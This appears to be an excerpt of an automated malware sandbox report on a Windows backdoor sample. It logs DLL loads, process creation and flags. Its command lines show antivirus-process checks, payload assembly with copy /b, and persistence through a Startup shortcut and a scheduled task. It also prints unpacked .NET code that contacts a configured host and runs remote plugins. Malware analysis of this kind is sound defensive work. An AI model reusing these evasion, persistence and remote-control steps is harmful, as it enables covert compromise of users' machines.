Section loaded: wtsapi32.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: winsta.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: jscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: apphelp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: twext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cscui.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wsock32.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: version.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: winmm.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: mpr.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wininet.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: iphlpapi.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: userenv.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: uxtheme.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: windows.storage.dll |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wldp.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: mpclient.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: secur32.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: sspicli.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: version.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: msasn1.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: userenv.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: gpapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: amsi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: profapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: wscapi.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: urlmon.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: iertutil.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: srvcli.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: netutils.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: slc.dll |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Section loaded: sppc.dll |
|
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068 |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" |
|
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Program Files\Windows Defender\MpCmdRun.exe |
Process information set: NOOPENFILEERRORBOX |
|